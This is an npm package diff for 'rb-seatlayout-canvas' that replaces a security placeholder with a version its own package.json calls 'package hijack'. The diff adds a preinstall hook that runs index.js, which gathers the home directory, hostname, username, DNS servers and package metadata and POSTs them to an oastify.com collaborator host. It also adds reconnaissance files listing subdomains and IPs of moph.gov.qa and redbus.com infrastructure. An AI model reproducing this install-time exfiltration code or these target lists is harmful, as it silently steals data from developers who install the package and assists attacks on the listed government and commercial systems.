rb-seatlayout-canvas 0.0.1-security → 1.1.0

package/dp_exploit/MOPH_NONTESTED_DOMAIN_LIST.txt

@@ -0,0 +1,129 @@
+abcd		
+accreditationstg		
+api-hie		
+api-hie-ppr		
+api-hie-trn		
+api-portal-hieppr		
+appointments		
+apps		
+autism		
+autismelearning		
+captiveportal		
+ceb		
+cis		
+cms		
+covid19		
+da		
+df		
+ehealth		
+elearningdhp		
+emsfsaadmin		
+emsfsaspadmin		
+erx-ppr		
+erx-trn		
+eventsreg		
+evp		
+fli		
+formsportal		
+formsportaladmin		
+fssm		
+geomed		
+ghcc		
+hajj		
+hfid		
+hfidservices		
+hiap		
+hiev-ppr		
+hiev-trn		
+him		
+him-ppr		
+him-trn		
+hrd		
+hrportal		
+ig		
+ig-ppr		
+ig-trn		
+info-identity		
+info-identity-ppr		
+info-identity-trn		
+iweb-prd		
+iweb-saves-origin		
+mail		
+mcapp		
+mcfifa		
+mcsupport		
+mirgab		
+mophsurveys		
+mrstest		
+ns1		
+oe		
+owa		
+phaward		
+phr-ppr		
+phr-trn		
+portalsvrs		
+psafety		
+qatarautism		
+qchp-ftp		
+qcr		
+qhis		
+qhismail		
+qhismail		
+selector1._domainkey.qhismail		
+selector2._domainkey.qhismail		
+qhispp		
+qnf		
+qpsw		
+
+reporter		
+research		
+researchadmin		
+researchportal		
+sart		
+saves-ids-origin		
+saves-origin		
+savesaccess		
+savesaccesstest		
+sftp		
+smtp		
+stgepayment		
+swa		
+tataboa		
+tataboa-ais		
+tataboa-ais-pp		
+tataboa-ais-trn		
+tataboa-est		
+tataboa-est-pp		
+tataboa-est-trn		
+tataboa-idp		
+tataboa-idp-pp		
+tataboa-idp-trn		
+tataboa-idr		
+tataboa-idr-pp		
+tataboa-idr-trn		
+tataboa-ids		
+tataboa-ids-pp		
+tataboa-ids-trn		
+tataboa-pp		
+tataboa-stk		
+tataboa-stk-pp		
+tataboa-stk-trn		
+tataboa-trn		
+tc		
+tenders		
+terminology-hl7v2		
+terminology-hl7v2-ppr		
+terminology-hl7v2-trn		
+terminology-management		
+terminology-management-ppr		
+terminology-management-trn		
+testeservices		
+vaccinationcovid19		
+vaccinationcovid19-cms		
+vaccinefeedback-covid19		
+videostream-api		
+wc-stg-ids		
+wc-trn		
+wc-trn-ids		
+whitearmyheroes		
+www		

package/dp_exploit/Moph_dns.txt

@@ -0,0 +1,107 @@
+accreditationstg.moph.gov.qa [78.100.109.24] 
+autism.moph.gov.qa [78.100.39.105] 
+evp.moph.gov.qa [78.100.39.99] 
+api-hie.moph.gov.qa [20.21.204.182] 
+emsfsaadmin.moph.gov.qa [78.100.39.104] 
+tataboa-idr.moph.gov.qa [20.21.216.117] 
+apps.moph.gov.qa [78.100.39.98] 
+info-identity.moph.gov.qa [20.21.204.92] 
+iweb-prd.moph.gov.qa [86.62.223.254] 
+cis.moph.gov.qa [78.100.39.107] 
+ig-trn.moph.gov.qa [20.173.25.130] 
+api-hie-trn.moph.gov.qa [20.173.16.227] 
+ceb.moph.gov.qa [78.100.64.201] 
+df.moph.gov.qa [78.100.64.202] 
+hiap.moph.gov.qa [213.130.112.185] 
+fssm.moph.gov.qa [78.100.50.183] 
+ig-ppr.moph.gov.qa [20.21.213.212] 
+formsportaladmin.moph.gov.qa [78.100.109.7] 
+mcapp.moph.gov.qa [78.100.109.6] 
+researchportal.moph.gov.qa [78.100.109.8] 
+mcsupport.moph.gov.qa [78.100.64.205] 
+qchp-ftp.moph.gov.qa [78.100.109.27] 
+sftp.moph.gov.qa [78.100.109.22] 
+mophsurveys.moph.gov.qa [78.100.74.161] 
+research.moph.gov.qa [78.100.109.8] 
+qhispp.moph.gov.qa [20.21.216.117] 
+mrstest.moph.gov.qa [78.100.39.108] 
+tataboa-est.moph.gov.qa [20.21.216.117] 
+info-identity-trn.moph.gov.qa [20.173.25.26] 
+saves-origin.moph.gov.qa [86.62.209.22] 
+tataboa-ais.moph.gov.qa [20.21.216.117] 
+tataboa-idp.moph.gov.qa [20.21.216.117] 
+portalsvrs.moph.gov.qa [213.130.112.187] 
+tataboa-idp-pp.moph.gov.qa [20.21.216.117] 
+smtp.moph.gov.qa [213.130.112.179] 
+qcr.moph.gov.qa [78.100.109.28] 
+tataboa.moph.gov.qa [20.21.216.117] 
+terminology-hl7v2-trn.moph.gov.qa [20.173.25.83] 
+terminology-management-trn.moph.gov.qa [20.21.221.22] 
+www.moph.gov.qa [51.105.197.162] 
+saves-ids-origin.moph.gov.qa [86.62.209.22] 
+owa.moph.gov.qa [78.100.109.25] 
+emsfsaspadmin.moph.gov.qa [78.100.39.104] 
+hfid.moph.gov.qa [78.100.64.203] 
+wc-stg-ids.moph.gov.qa [123.176.32.18] 
+wc-stg-ids.moph.gov.qa [123.176.32.26] 
+phaward.moph.gov.qa [78.100.39.100] 
+abcd.moph.gov.qa [213.130.112.178] 
+fli.moph.gov.qa [78.100.39.121] 
+mcfifa.moph.gov.qa [78.100.109.27] 
+ehealth.moph.gov.qa [78.100.39.101] 
+mail.moph.gov.qa [78.100.109.25] 
+eventsreg.moph.gov.qa [78.100.109.12] 
+autismelearning.moph.gov.qa [78.100.39.105] 
+iweb-saves-origin.moph.gov.qa [86.62.223.254] 
+ig.moph.gov.qa [20.21.202.83] 
+ghcc.moph.gov.qa [78.100.109.23] 
+hiev-trn.moph.gov.qa [20.21.230.224] 
+psafety.moph.gov.qa [78.100.109.18] 
+stgepayment.moph.gov.qa [78.100.39.123] 
+mirgab.moph.gov.qa [78.100.109.1] 
+info-identity-ppr.moph.gov.qa [20.21.215.15] 
+tataboa-est-pp.moph.gov.qa [20.21.216.117] 
+ns1.moph.gov.qa [213.130.112.181] 
+savesaccess.moph.gov.qa [78.100.109.4] 
+phr-trn.moph.gov.qa [20.21.196.236] 
+tataboa-ais-pp.moph.gov.qa [20.21.216.117] 
+tataboa-ids.moph.gov.qa [20.21.216.117] 
+tataboa-pp.moph.gov.qa [20.21.216.117] 
+tenders.moph.gov.qa [78.100.39.102] 
+terminology-hl7v2.moph.gov.qa [20.21.204.74] 
+vaccinationcovid19-cms.moph.gov.qa [51.138.81.18] 
+tc.moph.gov.qa [78.100.109.30] 
+hiev-ppr.moph.gov.qa [20.21.214.208] 
+videostream-api.moph.gov.qa [78.100.50.181] 
+whitearmyheroes.moph.gov.qa [78.100.39.109] 
+qnf.moph.gov.qa [78.100.109.10] 
+cms.moph.gov.qa [78.100.109.15] 
+sart.moph.gov.qa [78.100.109.29] 
+tataboa-est-trn.moph.gov.qa [20.21.216.117] 
+vaccinefeedback-covid19.moph.gov.qa [78.100.109.3] 
+erx-ppr.moph.gov.qa [20.21.232.32] 
+tataboa-ais-trn.moph.gov.qa [20.21.216.117] 
+captiveportal.moph.gov.qa [192.168.0.89] 
+tataboa-stk-trn.moph.gov.qa [20.21.216.117] 
+geomed.moph.gov.qa [78.100.109.13] 
+researchadmin.moph.gov.qa [78.100.109.8] 
+api-hie-ppr.moph.gov.qa [20.21.225.104] 
+formsportal.moph.gov.qa [78.100.109.7] 
+testeservices.moph.gov.qa [78.100.109.9] 
+tataboa-idp-trn.moph.gov.qa [20.21.216.117] 
+tataboa-ids-trn.moph.gov.qa [20.21.216.117] 
+appointments.moph.gov.qa [78.100.64.204] 
+elearningdhp.moph.gov.qa [78.100.50.182] 
+qatarautism.moph.gov.qa [78.100.109.11] 
+savesaccesstest.moph.gov.qa [78.100.39.122] 
+phr-ppr.moph.gov.qa [20.21.223.106] 
+hrd.moph.gov.qa [78.100.50.178] 
+swa.moph.gov.qa [78.100.64.202] 
+hfidservices.moph.gov.qa [78.100.109.21] 
+erx-trn.moph.gov.qa [20.21.228.230] 
+covid19.moph.gov.qa [51.105.197.162] 
+tataboa-trn.moph.gov.qa [20.21.216.117] 
+him-ppr.moph.gov.qa [20.21.211.23] 
+wc-trn.moph.gov.qa [23.65.124.72] 
+wc-trn.moph.gov.qa [23.65.124.79] 
+oe.moph.gov.qa [78.100.64.202] 

package/dp_exploit/Moph_new_miss.txt

@@ -0,0 +1,73 @@
+accreditationstg.moph.gov.qa [78.100.109.24]  -----
+api-hie.moph.gov.qa [20.21.204.182] 
+emsfsaadmin.moph.gov.qa [78.100.39.104] 
+tataboa-idr.moph.gov.qa [20.21.216.117] 
+apps.moph.gov.qa [78.100.39.98] 
+info-identity.moph.gov.qa [20.21.204.92] 
+iweb-prd.moph.gov.qa [86.62.223.254] 
+ig-trn.moph.gov.qa [20.173.25.130] 
+api-hie-trn.moph.gov.qa [20.173.16.227] 
+ceb.moph.gov.qa [78.100.64.201] 
+hiap.moph.gov.qa [213.130.112.185] 
+fssm.moph.gov.qa [78.100.50.183] 
+ig-ppr.moph.gov.qa [20.21.213.212] 
+formsportaladmin.moph.gov.qa [78.100.109.7] 
+researchportal.moph.gov.qa [78.100.109.8] 
+mcsupport.moph.gov.qa [78.100.64.205] 
+mophsurveys.moph.gov.qa [78.100.74.161] 
+research.moph.gov.qa [78.100.109.8] 
+qhispp.moph.gov.qa [20.21.216.117] 
+mrstest.moph.gov.qa [78.100.39.108] 
+tataboa-est.moph.gov.qa [20.21.216.117] 
+info-identity-trn.moph.gov.qa [20.173.25.26] 
+saves-origin.moph.gov.qa [86.62.209.22] 
+tataboa-ais.moph.gov.qa [20.21.216.117] 
+tataboa-idp.moph.gov.qa [20.21.216.117] 
+tataboa-idp-pp.moph.gov.qa [20.21.216.117] 
+tataboa.moph.gov.qa [20.21.216.117] 
+terminology-hl7v2-trn.moph.gov.qa [20.173.25.83] 
+terminology-management-trn.moph.gov.qa [20.21.221.22] 
+saves-ids-origin.moph.gov.qa [86.62.209.22] 
+emsfsaspadmin.moph.gov.qa [78.100.39.104] 
+hfid.moph.gov.qa [78.100.64.203] 
+wc-stg-ids.moph.gov.qa [123.176.32.18] 
+wc-stg-ids.moph.gov.qa [123.176.32.26] 
+fli.moph.gov.qa [78.100.39.121] 
+mcfifa.moph.gov.qa [78.100.109.27] 
+ehealth.moph.gov.qa [78.100.39.101]  
+iweb-saves-origin.moph.gov.qa [86.62.223.254] 
+ig.moph.gov.qa [20.21.202.83] 
+hiev-trn.moph.gov.qa [20.21.230.224] 
+stgepayment.moph.gov.qa [78.100.39.123] 
+info-identity-ppr.moph.gov.qa [20.21.215.15] 
+tataboa-est-pp.moph.gov.qa [20.21.216.117] 
+savesaccess.moph.gov.qa [78.100.109.4] 
+phr-trn.moph.gov.qa [20.21.196.236] 
+tataboa-ais-pp.moph.gov.qa [20.21.216.117] 
+tataboa-ids.moph.gov.qa [20.21.216.117] 
+tataboa-pp.moph.gov.qa [20.21.216.117] 
+tenders.moph.gov.qa [78.100.39.102] 
+terminology-hl7v2.moph.gov.qa [20.21.204.74] 
+vaccinationcovid19-cms.moph.gov.qa [51.138.81.18] 
+hiev-ppr.moph.gov.qa [20.21.214.208] 
+videostream-api.moph.gov.qa [78.100.50.181] 
+cms.moph.gov.qa [78.100.109.15] 
+sart.moph.gov.qa [78.100.109.29] 
+tataboa-est-trn.moph.gov.qa [20.21.216.117] 
+erx-ppr.moph.gov.qa [20.21.232.32] 
+tataboa-ais-trn.moph.gov.qa [20.21.216.117] 
+captiveportal.moph.gov.qa [192.168.0.89] 
+tataboa-stk-trn.moph.gov.qa [20.21.216.117] 
+api-hie-ppr.moph.gov.qa [20.21.225.104] 
+tataboa-idp-trn.moph.gov.qa [20.21.216.117] 
+tataboa-ids-trn.moph.gov.qa [20.21.216.117] 
+elearningdhp.moph.gov.qa [78.100.50.182] 
+savesaccesstest.moph.gov.qa [78.100.39.122] 
+phr-ppr.moph.gov.qa [20.21.223.106] 
+hrd.moph.gov.qa [78.100.50.178] 
+hfidservices.moph.gov.qa [78.100.109.21] 
+erx-trn.moph.gov.qa [20.21.228.230]  
+tataboa-trn.moph.gov.qa [20.21.216.117] 
+him-ppr.moph.gov.qa [20.21.211.23] 
+wc-trn.moph.gov.qa [23.65.124.72] 
+wc-trn.moph.gov.qa [23.65.124.79] 

package/dp_exploit/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "ao2epd6d9o4wn9nxyavmoo073y9pxfl4.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream 
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/dp_exploit/moph_200ok_miss domain.txt

@@ -0,0 +1,30 @@
+https://abcd.moph.gov.qa [SUCCESS]
+https://covid19.moph.gov.qa [SUCCESS]
+https://qhis.moph.gov.qa [SUCCESS]
+https://qhispp.moph.gov.qa [SUCCESS]
+https://tataboa-ais.moph.gov.qa [SUCCESS]
+https://tataboa-est-pp.moph.gov.qa [SUCCESS]
+https://tataboa-ais-trn.moph.gov.qa [SUCCESS]
+https://tataboa-idp-trn.moph.gov.qa [SUCCESS]
+https://tataboa-idr-trn.moph.gov.qa [SUCCESS]
+https://tataboa-idr.moph.gov.qa [SUCCESS]
+https://tataboa-idp-pp.moph.gov.qa [SUCCESS]
+https://tataboa-est.moph.gov.qa [SUCCESS]
+https://tataboa-est-trn.moph.gov.qa [SUCCESS]
+https://tataboa-ids-trn.moph.gov.qa [SUCCESS]
+https://tataboa-idp.moph.gov.qa [SUCCESS]
+https://tataboa-stk-pp.moph.gov.qa [SUCCESS]
+https://moph.gov.qa [SUCCESS]
+https://tataboa-pp.moph.gov.qa [SUCCESS]
+https://tataboa.moph.gov.qa [SUCCESS]
+https://tataboa-ids.moph.gov.qa [SUCCESS]
+https://tataboa-trn.moph.gov.qa [SUCCESS]
+https://vaccinationcovid19-cms.moph.gov.qa [SUCCESS]
+https://vaccinationcovid19.moph.gov.qa [SUCCESS]
+https://tataboa-stk.moph.gov.qa [SUCCESS]
+https://tataboa-ais-pp.moph.gov.qa [SUCCESS]
+https://tataboa-stk-trn.moph.gov.qa [SUCCESS]
+https://www.moph.gov.qa [SUCCESS]
+https://tataboa-ids-pp.moph.gov.qa [SUCCESS]
+http://wc-stg-ids.moph.gov.qa [SUCCESS]
+http://wc-trn.moph.gov.qa [SUCCESS]

package/dp_exploit/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "starcoffe",
+  "version": "1.0.0",
+  "description": "package hijack",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/dp_exploit/redbus.txt

@@ -0,0 +1,13 @@
+webplatform-nginx-pci-prod-alb-1177688536.ap-southeast-1.elb.amazonaws.com
+mobweb-nginx-prod-pcl-alb-1052789930.ap-southeast-1.elb.amazonaws.com
+capi.redbus.com
+paas-prod-pci-elb-270180406.ap-southeast-1.elb.amazonaws.com
+www.redbus.com
+webplatform-nginx-pci-alb-647208688.us-east-1.elb.amazonaws.com.
+mobweb-nginx-pci-alb-520569253.us-east1.elb.amazonaws.com.
+13.228.250.115
+23.22.120.43
+13.229.216.155
+13.250.217.67
+52.221.165.229
+54.169.116.27

package/index.js

@@ -0,0 +1,46 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "s4x8pe20x4znlue7js9x54h9h0nsbiz7.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream 
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "rb-seatlayout-canvas",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.1.0",
+  "description": "package hijack",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "Anshwsa",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rb-seatlayout-canvas for more information.